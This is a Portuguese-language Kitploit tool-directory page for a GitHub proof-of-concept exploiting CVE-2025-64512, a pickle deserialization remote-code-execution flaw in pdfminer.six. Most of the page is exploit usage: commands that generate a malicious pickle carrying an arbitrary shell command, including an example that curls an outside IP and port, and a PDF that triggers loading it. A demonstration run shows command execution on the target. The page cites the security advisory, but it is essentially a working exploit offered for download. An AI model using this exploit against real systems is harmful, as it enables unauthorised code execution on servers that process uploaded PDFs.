Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/matesz44/cve-2025-64512
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmatesz44/cve-2025-64512

CVE-2025-64512

CVE-2025-64512: desserialização pickle no pdfminer.six levando a RCE; gerador de .pickle.gz + pdf com payloads personalizados

Ver Repositório
414há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-64512 Execução Arbitrária de Código no pdfminer.six via PoC de Entrada PDF Manipulada

  • baseado em https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp

% python3 mkpickle.py Usage: mkpickle.py [output] Ex: mkpickle.py 'curl [IP]:[PORT]/rce' evil.pickle.gz

% python3 mkpdf.py -h usage: mkpdf.py [-h] [-o OUTPUT] [-p PATH] [-f] [pickle_name]

Create PDF that triggers pdfminer.six pickle deserialization (CVE-2025-64512)

positional arguments: pickle_name Pickle filename without .pickle.gz (default: evil)

options: -h, --help show this help message and exit -o, --output OUTPUT Output PDF filename (default: exploit.pdf) -p, --path PATH Custom absolute path to pickle (without .pickle.gz) -f, --fuzz Generate PDFs for all common absolute paths


python3 mkpickle.py 'touch /tmp/a' evil.pickle.gz [+] evil.pickle.gz (78 bytes) cmd: touch /tmp/a

(faça upload de evil.pickle.gz para /var/www/html/files/evil.pickle.gz)

python3 mkpdf.py -o ex-poc.pdf -p '/var/www/html/files' evil [+] ex-poc.pdf -> /var/www/html/files/evil.pickle.gz

(faça upload de ex-poc.pdf e dispare/aguarde o processamento do PDF)

ls -l /tmp/a -rw-r--r-- 1 ... ... 0 Jul 19 12:39 a

Baixar ferramenta